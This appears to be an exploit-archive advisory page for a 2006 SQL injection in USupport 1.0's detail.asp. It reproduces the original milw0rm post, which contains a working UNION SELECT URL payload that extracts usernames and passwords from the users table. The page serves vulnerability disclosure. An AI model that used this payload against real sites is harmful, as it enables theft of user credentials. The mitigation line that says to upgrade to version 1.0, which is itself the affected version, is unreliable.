header-logo
Suggest Exploit
vendor:
USupport
by:
ajann
9,3
CVSS
HIGH
Remote SQL Injection Vulnerability
89
CWE
Product Name: USupport
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:superfreaker:usupport:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2006

USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability

USupport 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of USupport 1.0.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author :   ajann
# Vendor: http://www.superfreaker.com/
# Dork   :   UPublisher


*******************************************************************************

###http://[target]/[path]//detail.asp?id=[SQL]

Example:

//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-12]